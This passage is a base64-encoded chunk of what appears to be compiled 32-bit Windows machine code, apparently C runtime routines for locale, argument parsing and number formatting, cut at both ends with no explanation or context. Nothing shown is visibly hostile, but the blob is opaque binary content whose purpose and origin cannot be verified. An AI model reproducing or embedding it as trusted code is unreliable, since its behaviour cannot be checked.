/4PEFIvlXcOL/1WL7FFqAP91EFFRi8T/dQz/dQhQ6B7t//+DxAxqAOji+P//g8QUi+Vdw4v/VYvsuP//AACD7BhmOUUID4S0AAAA/3UMjU3o6NBC//+LReyLgKgAAACFwHUhi00IjUGfZoP4GXcNZoPpIA+3wYlF+GaLyA+3wYlF+OsfuQABAABmOU0IczJqAv91COgNTwAAWVmFwHUJZotFCA+3wOsRi0XsD7dNCIuAmAAAAA+2BAgPt8CJRfjrImoBjU38UWoBjU0IUWgAAgAAUOjiYwAAg8QYhcB1DGaLRQgPt8CJRfjrBGaLRfyAffQAdAqLTeiDoVADAAD9i+Vdw4v/VYvsagD/dQjoIv///1lZXcOL/1WL7FGLRQiFwHUFi0UQiwAPtwgz0lNWV4t9DGaFyXQwD7cfi9dmhdt0EovzZjvxdAuDwgIPtzJmhfZ18DPJZjkKdAuDwAIPtwhmhcl11TPSi/BmORB0PA+3H4vPZoXbdBsPtxCJVfyL02Y7Vfx0C4PBAg+3EWaF0nXvM9JmORF1CoPAAmY5EHXR6wgzyWaJCIPAAotNEF+JASvG99gbwCPGXluL5V3Di/9Vi+yLRRCFwHUU6LwWAADHABYAAADoehMAADPAXcODfQwAdOaDfQgAdQWDOAB021D/dQz/dQjoGv///4PEDF3D/xUIQgcQo6yRChD/FQRCBxCjsJEKELABw7i4kQoQw4v/VYvsUVGhGGAKEDPFiUX8i0UMU1aLdQgrxoPAA1cz/8HoAjl1DBvb99Mj2HQciwaJRfiFwHQLi8j/FVhGBxD/VfiDxgRHO/t15ItN/F9eM81b6NAf//+L5V3Di/9Vi+xRoRhgChAzxYlF/FaLdQhX6xeLPoX/dA6Lz/8VWEYHEP/XhcB1CoPGBDt1DHXkM8CLTfxfM81e6Isf//+L5V3Di/9Vi+y4Y3Nt4DlFCHQEM8Bdw/91DFDoBAAAAFlZXcOL/1WL7FFRoRhgChAzxYlF/Fbo+R4AAIvwhfYPhEMBAACLFovKUzPbV42CkAAAADvQdA6LfQg5OXQJg8EMO8h19YvLhcl0B4t5CIX/dQczwOkNAQAAg/8FdQszwIlZCEDp/QAAAIP/AQ+E8QAAAItGBIlF+ItFDIlGBIN5BAgPhcQAAACNQiSNUGzrBolYCIPADDvCdfaLXgi4kQAAwDkBd090RIE5jQAAwHQzgTmOAADAdCKBOY8AAMB0EYE5kAAAwHVvx0YIgQAAAOtmx0YIhgAAAOtdx0YIgwAAAOtUx0YIggAAAOtLx0YIhAAAAOtCgTmSAADAdDOBOZMAAMB0IoE5tAIAwHQRgTm1AgDAdSLHRgiNAAAA6xnHRgiOAAAA6xDHRgiFAAAA6wfHRgiKAAAA/3YIi89qCP8VWEYHEP/XWYleCOsQ/3EEiVkIi8//FVhGBxD/14tF+FmJRgSDyP9fW4tN/DPNXuj4Hf//i+Vdw4v/VYvsM8CBfQhjc23gD5TAXcNqDGhINQoQ6ADpAACLdRCF9nUS6EIBAACEwHQJ/3UI6HoBAABZagLowTUAAFmDZfwAgD3EkQoQAA+FmQAAADPAQLm8kQoQhwHHRfwBAAAAi30Mhf91PIsdGGAKEIvTg+IfaiBZK8ozwNPIM8OLDcCRChA7yHQVM9kzwFBQUIvK08uLy/8VWEYHEP/TaOCSChDrCoP/AXULaOySChDo4AoAAFmDZfwAhf91EWiMRgcQaHxGBxDoAP3//1lZaJRGBxBokEYHEOjv/P//WVmF9nUHxgXEkQoQAcdF/P7////oJwAAAIX2dSz/dQjoKgAAAItF7IsA/zDo8v7//4PEBMOLZejoNQwAAIt1EGoC6CQ1AABZw+g96AAAw4v/VYvs6O4yAACEwHQgZKEwAAAAi0BowegIqAF1EP91CP8VxEMHEFD/FShCBxD/dQjoTwAAAFn/dQj/FQBCBxDMagD/FWhCBxCLyIXJdQMywMO4TVoAAGY5AXXzi0E8A8GBOFBFAAB15rkLAQAAZjlIGHXbg3h0DnbVg7joAAAAAA+VwMOL/1WL7FFRoRhgChAzxYlF/INl+ACNRfhQaNhcBxBqAP8V/EEHEIXAdCNWaPBcBxD/dfj/FXBCBxCL8IX2dA3/dQiLzv8VWEYHEP/WXoN9+AB0Cf91+P8VbEIHEItN/DPN6N0b//+L5V3Di/9Vi+yLRQijwJEKEF3DagFqAGoA6N79//+DxAzDi/9Vi+xqAGoC/3UI6Mn9//+DxAxdw6G8kQoQw4v/VYvsg+wMg30IAlZ0HIN9CAF0FujJEQAAahZeiTDoiA4AAIvG6fQAAABTV+ilZwAAaAQBAAC+yJEKEDP/Vlf/FfhBBxCLHayRChCJNbSRChCF23QFgDsAdQKL3o1F9Il9/FCNRfyJffRQV1dT6LEAAABqAf919P91/OgZAgAAi/CDxCCF9nUM6FURAABqDF+JOOsxjUX0UI1F/FCLRfyNBIZQVlPoeQAAAIPEFIN9CAF1FotF/EijoJEKEIvGi/ejpJEKEIvf60qNRfiJffhQVugbYgAAi9hZWYXbdAWLRfjrJotV+IvPi8I5OnQIjUAEQTk4dfiLx4kNoJEKEIlF+IvfiRWkkQoQUOgmCgAAWYl9+FboHAoAAFlfi8NbXovlXcOL/1WL7FGLRRRTi10YVot1CFeDIwCLfRDHAAEAAACLRQyFwHQIiTiDwASJRQwyyYhN/4A+InUNhMmwIg+UwUaITf/rNf8Dhf90BYoGiAdHigZGiEX+D77AUOhfaQAAWYXAdAz/A4X/dAWKBogHR0aKRf6EwHQZik3/hMl1tTwgdAQ8CXWthf90B8ZH/wDrAU7GRf8AgD4AD4TCAAAAigY8IHQEPAl1A0br84A+AA+ErAAAAItNDIXJdAiJOYPBBIlNDItFFP8AM9JCM8DrAkZAgD5cdPmAPiJ1MagBdR6KTf+EyXQPjU4BgDkidQSL8esLik3/M9KEyQ+URf/R6OsLSIX/dATGB1xH/wOFwHXxigaEwHQ7gH3/AHUIPCB0MTwJdC2F0nQjhf90A4gHRw++BlDohmgAAFmFwHQMRv8Dhf90BYoGiAdH/wNG6Xf///+F/3QExgcAR/8D6TX///+LTQxfXluFyXQDgyEAi0UU/wCL5V3Di/9Vi+xWi3UIgf7///8/cgQzwOs9V4PP/4tNDDPSi8f3dRA7yHMND69NEMHmAiv+O/l3BDPA6xmNBDFqAVDofwkAAGoAi/DoUQgAAIPEDIvGX15dw4v/VYvsXekH/f//odCSChCFwHUlOQXUkgoQdQMzwMPoFgAAAIXAdfToZgEAAPfYG8D30CMF0JIKEMODPdCSChAAdAMzwMNWV+icZAAA6PBnAACL8IX2dQWDz//rKlboMAAAAFmFwHUFg8//6xJQudCSChCj3JIKEOjbbAAAM/9qAOjCBwAAWVbouwcAAFmLx19ew4v/VYvsUVFTVleLfQgz0ov3igfrGDw9dAFCi86NWQGKAUGEwHX5K8tGA/GKBoTAdeSNQgFqBFDonggAAIvYWVmF23RtiV3861KLz41RAYoBQYTAdfkryoA/PY1BAYlF+HQ3agFQ6HAIAACL8FlZhfZ0MFf/dfhW6MEHAACDxAyFwHVBi0X8agCJMIPABIlF/OggBwAAi0X4WQP4gD8AdanrEVPoKQAAAGoA6AYHAABZWTPbagDo+wYAAFlfXovDW4vlXcMzwFBQUFBQ6GsKAADMi/9Vi+xWi3UIhfZ0H4sGV4v+6wxQ6MoGAACNfwSLB1mFwHXwVui6BgAAWV9eXcOL/1eLPdSSChCF/3UFg8j/X8NTVjPb61FTU1NTav//N1NT/xVgQwcQi9iF23RMagFT6KQHAACL8FlZhfZ0NWoAagBTVmr//zcz21NT/xVgQwcQhcB0HVNW6BVqAABT6FIGAACDxAyDxwQ5H3WrM8BeW1/DVug8BgAAWYPI/+vwi/9Vi+xRoRhgChAzxYlF/FaL8VeNfgTrEYtNCFb/FVhGBxD/VQhZg8YEO/d164tN/F8zzV7oZRb//4vlXcIEAIv/VYvsi0UIiwA7BdySChB0B1Do+v7//1ldw4v/VYvsi0UIiwA7BdiSChB0B1Do3/7//1ldw+l+/f//aEYkBhC50JIKEOh2////aGEkBhC51JIKEOhn/////zXckgoQ6K7+////NdiSChDoo/7//1lZw+lx/f//agxocDUKEOjXE///g2XkAItFCP8w6NotAABZg2X8AItNDOgKAgAAi/CJdeTHRfz+////6A0AAACLxujqE///wgwAi3Xki0UQ/zDo7S0AAFnDagxokDUKEOiGE///g2XkAItFCP8w6IktAABZg2X8AItNDOiZAAAAi/CJdeTHRfz+////6A0AAACLxuiZE///wgwAi3Xki0UQ/zDonC0AAFnDi/9Vi+yD7AyLRQiNTf+JRfiJRfSNRfhQ/3UMjUX0UOiL////i+Vdw4v/VYvsg+wMi0UIjU3/iUX4iUX0jUX4UP91DI1F9FDoEv///4vlXcOL/1WL7KEYYAoQg+AfaiBZK8iLRQjTyDMFGGAKEF3Di/9Vi+yD7BihGGAKEDPFiUX8i8GJRehTiwCLGIXbdQiDyP/p6QAAAIsVGGAKEFZXizuL8otbBIPmHzP6iXXsi84z2tPP08uF/w+EvgAAAIP//w+EtQAAAIl99Ild8GogWSvOM8DTyDPCg+sEO99yYDkDdPWLM4tN7DPy086LzokD/xVYRgcQ/9aLReiLFRhgChCL8oPmH4l17IsAiwCLCItABDPKiU34M8KLztNN+NPIi034O030dQtqIFk7RfB0oItN+IlN9Iv5iUXwi9jrjoP//3QNV+iTAwAAixUYYAoQWYvCM9KD4B9qIFkryNPKi03oMxUYYAoQiwGLAIkQiwGLAIlQBIsBiwCJUAhfM8Bei038M81b6LsT//+L5V3Di/9Vi+yD7AyLwYlF+FaLAIswhfZ1CIPI/+keAQAAoRhgChCLyFOLHoPhH1eLfgQz2It2CDP4M/DTz9PO08s7/g+FtAAAACvzuAACAADB/gI78HcCi8aNPDCF/3UDaiBfO/5yHWoEV1PoqWYAAGoAiUX86NcCAACLTfyDxBCFyXUoagSNfgRXU+iJZgAAagCJRfzotwIAAItN/IPEEIXJdQiDyP/pkQAAAI0EsYvZiUX8jTS5oRhgChCLffyD4B9qIFkryDPA08iLzzMFGGAKEIlF9IvGK8eDwAPB6AI79xvS99Ij0IlV/HQQi1X0M8BAiRGNSQQ7Rfx19YtF+ItABP8w6Lr9//9TiQfo+Ar//4td+IsLiwmJAY1HBFDo5gr//4sLVosJiUEE6NkK//+LC4PEEIsJiUEIM8BfW16L5V3Di/9Vi+z/dQho4JIKEOheAAAAWVldw4v/VYvsUY1FCIlF/I1F/FBqAugD/f//WVmL5V3Di/9Vi+xWi3UIhfZ1BYPI/+soiwY7Rgh1H6EYYAoQg+AfaiBZK8gzwNPIMwUYYAoQiQaJRgSJRggzwF5dw4v/VYvsUVGNRQiJRfiNRQyJRfyNRfhQagLoyvz//1lZi+Vdw2gAYQoQuQyTChDoemYAALABw2jgkgoQ6IP////HBCTskgoQ6Hf///9ZsAHD6I37//+wAcOhGGAKEFZqIIPgHzP2WSvI084zNRhgChBW6A4EAABW6GJmAABW6AtoAABW6GpqAABW6J/1//+DxBSwAV7DagDoSh///1nDoRhnChCDyf9W8A/BCHUboRhnChC++GQKEDvGdA1Q6NwAAABZiTUYZwoQ/zUAkwoQ6MoAAAD/NQSTChAz9ok1AJMKEOi3AAAA/zWkkQoQiTUEkwoQ6KYAAAD/NaiRChCJNaSRChDolQAAAIPEEIk1qJEKELABXsOwAcNoeF0HEGgAXQcQ6LZkAABZWcPogBAAAIXAD5XAw+jFDwAAsAHDaHhdBxBoAF0HEOgUZQAAWVnDi/9Vi+z/dQjoBBEAAFmwAV3DagxosDUKEOjE2wAA6LkPAACLcAyF9nQeg2X8AIvO/xVYRgcQ/9brBzPAQMOLZejHRfz+////6OMAAADMi/9Vi+yDfQgAdC3/dQhqAP81MJcKEP8VTEMHEIXAdRhW6IcGAACL8P8V5EMHEFDoAAYAAFmJBl5dw4v/VYvsVot1CIP+4HcwhfZ1F0brFOheaQAAhcB0IFbo92QAAFmFwHQVVmoA/zUwlwoQ/xXIQgcQhcB02esN6DAGAADHAAwAAAAzwF5dw4v/VYvsi1UIVoXSdBGLTQyFyXQKi3UQhfZ1F8YCAOgCBgAAahZeiTDowQIAAIvGXl3DV4v6K/KKBD6IB0eEwHQFg+kBdfFfhcl1C4gK6NMFAABqIuvPM/br0+jyZQAAhcB0CGoW6EJmAABZ9gXwYAoQAnQhahfoCRL//4XAdAVqB1nNKWoBaBUAAEBqA+iSAAAAg8QMagPoivP//8yL/1WL7FaLdQiF9nQMauAz0lj39jtFDHI0D691DIX2dRdG6xToZGgAAIXAdCBW6P1jAABZhcB0FVZqCP81MJcKEP8VyEIHEIXAdNnrDeg2BQAAxwAMAAAAM8BeXcOL/1WL7FFqAWoKUVGLxGoA/3UIUOjH2f//g8QMagDo2Nn//4PEFIvlXcOL/1WL7IHsKAMAAKEYYAoQM8WJRfyDfQj/V3QJ/3UI6C4M//9ZalCNheD8//9qAFDosxz//2jMAgAAjYUw/f//agBQ6KAc//+NheD8//+DxBiJhdj8//+NhTD9//+Jhdz8//+JheD9//+Jjdz9//+Jldj9//+JndT9//+JtdD9//+Jvcz9//9mjJX4/f//ZoyN7P3//2aMncj9//9mjIXE/f//ZoylwP3//2aMrbz9//+cj4Xw/f//i0UEiYXo/f//jUUEiYX0/f//x4Uw/f//AQABAItA/ImF5P3//4tFDImF4Pz//4tFEImF5Pz//4tFBImF7Pz///8VPEIHEGoAi/j/FTRCBxCNhdj8//9Q/xU4QgcQhcB1E4X/dQ+DfQj/dAn/dQjoJwv//1mLTfwzzV/ohg3//4vlXcOL/1WL7P91CLn4kgoQ6BdiAABdw4v/VYvsUaEYYAoQM8WJRfxW6AENAACFwHQ1i7BcAwAAhfZ0K/91GP91FP91EP91DP91CIvO/xVYRgcQ/9aLTfyDxBQzzV7oIw3//4vlXcP/dRiLNRhgChCLzv91FDM1+JIKEIPhH/91ENPO/3UM/3UIhfZ1vugRAAAAzDPAUFBQUFDoef///4PEFMNqF+h/D///hcB0BWoFWc0pVmoBvhcEAMBWagLoBv7//4PEDFb/FcRDBxBQ/xUoQgcQXsOL/1WL7IPsEP91DI1N8Oh7Lf//jUX0UGoE/3UI6L7P//+DxAyAffwAdAqLTfCDoVADAAD9i+Vdw4v/VYvsg+wQ/3UMjU3w6EMt//+NRfRQagj/dQjohs///4PEDIB9/AB0CotN8IOhUAMAAP2L5V3Di/9Vi+yhCJMKEIXAdA5qAP91COh4////WVldw4tNCKEAYQoQD7cESIPgBF3Di/9Vi+yhCJMKEIXAdA5qAP91COiD////WVldw4tNCKEAYQoQD7cESIPgCF3Di/9Vi+yD7ByNTeRT/3UQ6LAs//+LXQiB+wABAABzS41F6FBT6CEBAABZWYTAdCSAffAAi0Xoi4CUAAAAD7YMGHQKi0Xkg6BQAwAA/YvB6fIAAACAffAAdAqLTeSDoVADAAD9i8Pp2wAAADPAZolF/IhF/otF6IN4BAF+LovDjU3owfgIiUX0UQ+2wFDopGQAAFlZhcB0E4tF9IhF/DPAagKIXf2IRf5Z6xboewEAADPJxwAqAAAAM8CIXfxBiEX9ZolF+I1V+IhF+otF6GoB/3AIagNSUY1N/FH/dQz/sKgAAACNRehQ6J9mAACDxCSFwHUYOEXwD4Rn////i0Xkg6BQAwAA/elY////g/gBdRaAffAAD7ZF+HQri03kg6FQAwAA/esfD7ZV+A+2RfnB4ggL0IB98AB0CotN5IOhUAMAAP2LwluL5V3Di/9Vi+z/dQxqAf91COi5zf//g8QM99gbwPfYXcOL/1WL7P91DGgAAQAA/3UI6IT+//+DxAxdw4v/VYvsoQiTChCFwHQQagD/dQjozv///1lZi8jrDotNCI1Bv4P4GXcDg8Egi8Fdw4v/VYvsi00IM8A7DMV4XQcQdCdAg/gtcvGNQe2D+BF3BWoNWF3DjYFE////ag5ZO8gbwCPBg8AIXcOLBMV8XQcQXcOL/1WL7FboGAAAAItNCFGJCOin////WYvw6BgAAACJMF5dw+hzCQAAhcB1Brj4YAoQw4PAFMPoYAkAAIXAdQa49GAKEMODwBDDi/9Vi+yD7BBTVot1DIX2dBiLXRCF23QRgD4AdRSLRQiFwHQFM8lmiQgzwF5bi+Vdw1f/dRSNTfDoSir//4tF9IO4qAAAAAB1FYtNCIXJdAYPtgZmiQEz/0fphAAAAI1F9FAPtgZQ6I1iAABZWYXAdECLffSDfwQBfic7XwR8JTPAOUUID5XAUP91CP93BFZqCf93CP8VBEMHEIt99IXAdQs7XwRyLoB+AQB0KIt/BOsxM8A5RQgPlcAz/1D/dQiLRfRHV1ZqCf9wCP8VBEMHEIXAdQ7oFP///4PP/8cAKgAAAIB9/AB0CotN8IOhUAMAAP2Lx1/pMf///4v/VYvsagD/dRD/dQz/dQjo8f7//4PEEF3Di/9Vi+yD7BRTi10MV4t9EIXbdRKF/3QOi0UIhcB0A4MgADPA63qLRQiFwHQDgwj/VoH/////f3YR6Jv+//9qFl6JMOha+///61P/dRiNTezoHin//4tF8DP2ObCoAAAAdV1mi0UUuf8AAABmO8F2NoXbdA+F/3QLV1ZT6EAW//+DxAzoUf7//2oqXokwgH34AHQKi03sg6FQAwAA/YvGXl9bi+Vdw4XbdAaF/3RfiAOLRQiFwHTWxwABAAAA686NTfyJdfxRVldTagGNTRRRVv9wCP8VYEMHEIvIhcl0EDl1/HWfi0UIhcB0ookI657/FeRDBxCD+Hp1iYXbdA+F/3QLV1ZT6LYV//+DxAzox/3//2oiXokw6Ib6///pbP///4v/VYvsagD/dRT/dRD/dQz/dQjox/7//4PEFF3Di/9Vi+yhtI0KEFZXg/gFfHyLdQiL1oPiH2ogWCvC99ob0iPQi0UMO8JzAovQjTwyi84793QKgDkAdAVBO8919ivOO8oPhdcAAACL+APOK/qLx4PgHyv4xfRXyQP56w/F9XQBxf3XwIXAdQeDwSA7z3Xti0UMA8brBoA5AHQFQTvIdfYrzsX4d+mUAAAAg/gBfHWLdQiL1oPiD2oQWCvC99ob0iPQi0UMO8JzAovQjTwyi84793QKgDkAdAVBO8919ivOO8p1Wov4A84r+mYP78mLx4PgDyv4A/nrEg8oAWYPdMFmD9fAhcB1B4PBEDvPdeqLRQwDxusGgDkAdAVBO8h19ivO6xqLVQiLyotFDAPCO9B0CoA5AHQFQTvIdfYryl+LwV5dw4v/VYvsUaG0jQoQi00IVleD+AUPjLwAAAD2wQF0J4tFDIvRjQRBO8gPhH0BAAAz/2Y5Og+EcgEAAIPCAjvQdfDpZgEAAIvxg+YfaiBYK8b33hv2I/CLRQzR7jvGcwKL8I0UcTP/iVX8i9E7Tfx0DWY5OnQIg8ICO1X8dfMr0dH6O9YPhScBAACNFFGLyCvOi8GD4B8ryMX0V8mNDErrD8X1dQLF/dfAhcB1B4PCIDvRde2LRQiLTQyNDEjrCGY5OnQHg8ICO9F19CvQ0frF+Hfp2gAAAIP4AQ+MswAAAPbBAXQni0UMi9GNBEE7yA+EuAAAADP/Zjk6D4StAAAAg8ICO9B18OmhAAAAi/GD5g9qEFgrxvfeG/Yj8ItFDNHuO8ZzAovwjRRxM/+JVfyL0TtN/HQNZjk6dAiDwgI7Vfx18yvR0fo71nVmjRRRZg/vyYvIK86LwYPgDyvIjQxK6xIPKAJmD3XBZg/XwIXAdQeDwhA70XXqi0UIi00MjQxI6whmOTp0B4PCAjvRdfQr0Osci0UMi9GNBEE7yHQOM/9mOTp0B4PCAjvQdfQr0dH6X4vCXovlXcNqCGjwNQoQ6GgC//+LRQj/MOhvHAAAWYNl/ACLTQyLQQSLAP8wiwH/MOj5AgAAWVnHRfz+////6AgAAADoeQL//8IMAItFEP8w6H8cAABZw2oIaBA2ChDoGAL//4tFCP8w6B8cAABZg2X8AItFDIsAiwCLSEiFyXQYg8j/8A/BAXUPgfn4ZAoQdAdR6IDz//9Zx0X8/v///+gIAAAA6BgC///CDACLRRD/MOgeHAAAWcNqCGgwNgoQ6LcB//+LRQj/MOi+GwAAWYNl/ABqAItFDIsA/zDoTQIAAFlZx0X8/v///+gIAAAA6M0B///CDACLRRD/MOjTGwAAWcNqCGjQNQoQ6GwB//+LRQj/MOhzGwAAWYNl/ACLRQyLAIsAi0BI8P8Ax0X8/v///+gIAAAA6IUB///CDACLRRD/MOiLGwAAWcOL/1WL7IPsDItFCI1N/4lF+IlF9I1F+FD/dQyNRfRQ6Oj+//+L5V3Di/9Vi+yD7AyLRQiNTf+JRfiJRfSNRfhQ/3UMjUX0UOhw/v//i+Vdw4v/VYvsg+wMi0UIjU3/iUX4iUX0jUX4UP91DI1F9FDo+f7//4vlXcOL/1WL7IPsDItFCI1N/4lF+IlF9I1F+FD/dQyNRfRQ6Bz///+L5V3Di/9Vi+xRUYtFCDPJQWpDiUgYi0UIxwA4XAcQi0UIiYhQAwAAi0UIWcdASPhkChCLRQhmiUhsi0UIZomIcgEAAItFCIOgTAMAAACNRQiJRfyNRfxQagXoff///41FCIlF+I1FDIlF/I1F+FBqBOgW////g8QQi+Vdw4v/VYvsg30IAHQS/3UI6A4AAAD/dQjomPH//1lZXcIEAIv/VYvsUYtFCIsIgfk4XAcQdApR6Hnx//+LRQhZ/3A86G3x//+LRQj/cDDoYvH//4tFCP9wNOhX8f//i0UI/3A46Ezx//+LRQj/cCjoQfH//4tFCP9wLOg28f//i0UI/3BA6Cvx//+LRQj/cEToIPH//4tFCP+wYAMAAOgS8f//jUUIiUX8jUX8UGoF6DX+//+NRQiJRfyNRfxQagTodP7//4PENIvlXcOL/1WL7FaLdQiDfkwAdCj/dkzom18AAItGTFk7BQyTChB0FD0AYQoQdA2DeAwAdQdQ6LBdAABZi0UMiUZMXoXAdAdQ6CFdAABZXcOh/GAKEIP4/3QhVlDowhMAAIvwhfZ0E2oA/zX8YAoQ6AUUAABW6MH+//9ew4v/Vlf/FeRDBxCL8KH8YAoQg/j/dAxQ6IsTAACL+IX/dUloZAMAAGoB6Gnx//+L+FlZhf91CVDoNvD//1nrOFf/NfxgChDoshMAAIXAdQNX6+VoDJMKEFfo6f3//2oA6A7w//+DxAyF/3QMVv8VdEMHEIvHX17DVv8VdEMHEOjR8P//zIv/U1ZX/xXkQwcQi/Az26H8YAoQg/j/dAxQ6AQTAACL+IX/dVFoZAMAAGoB6OLw//+L+FlZhf91CVPor+///1nrK1f/NfxgChDoKxMAAIXAdQNX6+VoDJMKEFfoYv3//1PoiO///4PEDIX/dQlW/xV0QwcQ6wlW/xV0QwcQi99fXovDW8NoiTgGEOjoEQAAo/xgChCD+P91AzLAw+hf////hcB1CVDoBgAAAFnr67ABw6H8YAoQg/j/dA1Q6AwSAACDDfxgChD/sAHDi/9Vi+xWi3UMiwY7BQyTChB0F4tNCKEcZwoQhYFQAwAAdQfoRV4AAIkGXl3Di/9Vi+xWi3UMiwY7BRhnChB0F4tNCKEcZwoQhYFQAwAAdQfojUsAAIkGXl3Di/9Vi+yLRQi5/wcAAFNWM9KLGItwBIvGwegUI8FXO8F1QzvSdT+L/ovDgef//w8AC8d1A0DrMIvOi8KB4QAAAIALwbgAAAgAdA072nUJO/h1BWoEWOsQI/AL1nQEagLr82oD6+8zwF9eW13Di/9Vi+yLRQgz0otIBIvCgeEAAACAC8F0AUKKwl3Di/9Vi+yD7DBTVleLfRwz24X/eQKL+4t1DI1N0P91KIge6GAf//+NRws5RRB3FOi59P//aiJfiTjoePH//+moAgAAi1UIiwKLSgSJReCLwcHoFCX/BwAAPf8HAAB1UjvbdU5T/3UkU1f/dRj/dRT/dRBWUuiLAgAAi/iDxCSF/3QHiB7pYgIAAGplVugj0QAAWVmFwHQTOF0gD5TB/smA4eCAwXCICIhYA4v76ToCAACB4QAAAICLwwvBdATGBi1Gi0oEM9s4XSBqMA+Uw8dF9P8DAABLM8CD4+CB4QAA8H+DwycLwYld5Fh1H4gGRotCBIsKJf//DwALyHUFIU306w3HRfT+AwAA6wTGBjFGi85GiU3ohf91BcYBAOsPi0XUi4CIAAAAiwCKAIgBi0IEJf//DwCJRfB3CYM6AA+GxQAAAINl/AC5AAAPAGowWIlF+IlN8IX/flOLAotSBCNF/CPRi034geL//w8AD7/J6JDHAABqMFlmA8EPt8CD+Dl2AgPDi03wi1UIiAZGi0X8D6zIBIlF/ItF+MHpBIPoBE+JTfCJRfhmhcB5qWaFwHhXiwKLUgQjRfwj0YtN+IHi//8PAA+/yeg4xwAAZoP4CHY2ajCNRv9bigiA+WZ0BYD5RnUFiBhI6++LXeQ7Reh0FIoIgPk5dQeAwzqIGOsJ/sGICOsD/kD/hf9+EFdqMFhQVui9Cv//g8QMA/eLReiAOAB1AovwgH0gALE0i1UID5TA/sgk4ARwiAaLAotSBOjAxgAAi8gz24Hh/wcAACtN9BvbeA9/BIXJcgnGRgErg8YC6w7GRgEtg8YC99mD0wD324v+ajBYiAaF23w/uOgDAAB/BDvIchZqAFBTUeiixwAABDCJVeSIBkY793ULhdt8Gn8Fg/lkchNqAGpkU1HogMcAAAQwiVXkiAZGO/d1C4XbfBp/BYP5CnITagBqClNR6F7HAAAEMIlV5IgGRmowWALIM/+IDsZGAQCAfdwAdAqLTdCDoVADAAD9i8dfXluL5V3Di/9Vi+yD7AyNRfRWi3UcV/91GP91FI1+AVCLRQhX/3AE/zDoC1wAAIPJ/4PEGDlNEHQXi00QM8CDffQtD5TAK8gzwIX2D5/AK8iNRfRQV4t9DFEzyYN99C0PlMEzwIX2D5/AA88DwVDo4FoAAIPEEIXAdAXGBwDrHP91KI1F9GoAUP91JP91IFb/dRBX6AkAAACDxCBfXovlXcOL/1WL7IPsEFZXi30Qhf9+BIvH6wIzwIPACTlFDHcX6Crx//9qIl6JMOjp7f//i8ZfXovlXcNT/3UkjU3w6KYb//+KVSCLXQiE0nQli00cM8CF/w+fwFAzwIM5LQ+UwAPDUP91DFPoBAQAAIpVIIPEEItFHIvzgzgtdQbGAy2NcwGF/34VikYBiAZGi0X0i4CIAAAAiwCKAIgGM8CE0g+UwAPHA/CDyP85RQx0B4vDK8YDRQxoIF8HEFBW6Gnq//+DxAxbhcB1do1OAjhFFHQDxgZFi1Uci0IIgDgwdC+LUgSD6gF5BvfaxkYBLWpkXzvXfAiLwpn3/wBGAmoKXzvXfAiLwpn3/wBGAwBWBIN9GAJ1FIA5MHUPagONQQFQUehhAP//g8QMgH38AHQKi0Xwg6BQAwAA/TPA6fL+//8zwFBQUFBQ6N3s///Mi/9Vi+yD7AwzwFZX/3UYjX30/3UUq6urjUX0i30cUItFCFf/cAT/MOggWgAAg8n/g8QYOU0QdA6LTRAzwIN99C0PlMAryIt1DI1F9FCLRfgDx1AzwIN99C1RD5TAA8ZQ6AJZAACDxBCFwHQFxgYA6xb/dSCNRfRqAFBX/3UQVugJAAAAg8QYX16L5V3Di/9Vi+yD7BCNTfBTVlf/dRzo+hn//4tVFIt9EItdCItKBEmAfRgAdBQ7z3UQM8CDOi0PlMADwWbHBBgwAIM6LYvzdQbGAy2NcwGLQgSFwH8VagFW/3UMU+g6AgAAg8QQxgYwRusCA/CF/35SagFW/3UMU+gfAgAAi0X0g8QQi4CIAAAAiwCKAIgGRotFFItIBIXJeSmAfRgAdQiLwffYO8d9BIv5999XVv91DFPo5QEAAFdqMFboogb//4PEHIB9/ABfXlt0CotF8IOgUAMAAP0zwIvlXcOL/1WL7IPsEFNWV/91GDPAjX3w/3UUq6urjUXwi30cUItFCFf/cAT/MOi7WAAAi0X0M8mLXQyDxBiDffAtD5TBSIlF/IPI/400GTlFEHQFi0UQK8GNTfBRV1BW6KNXAACDxBCFwHQFxgMA61WLRfRIOUX8D5zBg/j8fCo7x30mhMl0CooGRoTAdfmIRv7/dSiNRfBqAVBX/3UQU+iJ/v//g8QY6xz/dSiNRfBqAVD/dST/dSBX/3UQU+iT/P//g8QgX15bi+Vdw4v/VYvsg+xIoRhgChAzxYlF/ItVFItNEFOKXQwPtsODwAQ70HMVagzGAQBYi038M81b6Fz3/v+L5V3DhNt0CMYBLUFKxgEAuOBeBxDHRdzwXgcQiUW8M9s4XRiJRcC45F4HEIlFxA+Vw4lFyEu47F4HEMdF5PxeBxCJRdSD4wKJRdiJReiJRfiLRQhWvuheBxDHRewIXwcQV408hfz///+JdcyNBB+JddCJdeCJdfDHRfQUXwcQi3SFvI1GAYlFuIoGRoTAdfkrdbg78hvARwPHA8P/dIW8UlHo1Ob//4PEDF9ehcAPhEH///8zwFBQUFBQ6Lnp///Mi/9Vi+yLVRSF0nQmVot1EIvOV415AYoBQYTAdfkrz41BAVCNBBZWUOjp/P7/g8QMX15dw4v/VYvsUVFWV4t9DIX/dRboluz//2oWXokw6FXp//+LxukeAQAAU4tdEIXbdAyDfRQAdAaDfRgAdxbobOz//2oWXokw6Cvp//+LxunzAAAAi3Ucg/5BdBOD/kV0DoP+RnQJxkX8AIP+R3UExkX8AYtFJIPgCIPIAHUy/3UI6LP2//+JRfhZhcB0Iv91/FNX/3UI6Ar3//9ZD7bAUP91+Ogw/v//g8QU6ZcAAACLRSSD4BCDyAB0BGoD6wJqAliD/mF/KHQKg+5BdAWD7gTrH/91LFD/dfz/dSD/dRj/dRRTV/91COjW9v//61WD7mX/dSx0NoPuAXQZUP91/P91IP91GP91FFNX/3UI6P38///rL/91IP91GP91FFNX/3UI6IT7//+DxBzrGlD/dfz/dSD/dRj/dRRTV/91COiC+f//g8QkW19ei+Vdw4v/VYvsi0UMg0AI/otVDIN6CAB9Dw+3RQhSUOj4bAAAWVldw4sKZotFCGaJAYMCAl3Di/9Vi+yD7BChGGAKEDPFiUX8V4t9DItHDMHoDKgBdBBX/3UI6KX///9ZWennAAAAU1ZX6KhA//+7yGEKEFmD+P90Llfol0D//1mD+P50Ilfoi0D//4vwV8H+BuiAQP//g+A/a8AwWVkDBLUQkwoQ6wKLw4pAKTwCD4SMAAAAPAEPhIQAAABX6FRA//9Zg/j/dCxX6EhA//9Zg/j+dCBX6DxA//+L8FfB/gboMUD//4PgP2vYMFlZAxy1EJMKEPZDKIB0Rv91CI1F9GoFUI1F8FDooez//4PEEIXAdSYz9jl18H4ZD75ENfRXUOg2AAAAWVmD+P90DEY7dfB852aLRQjrErj//wAA6wtX/3UI6Lv+//9ZW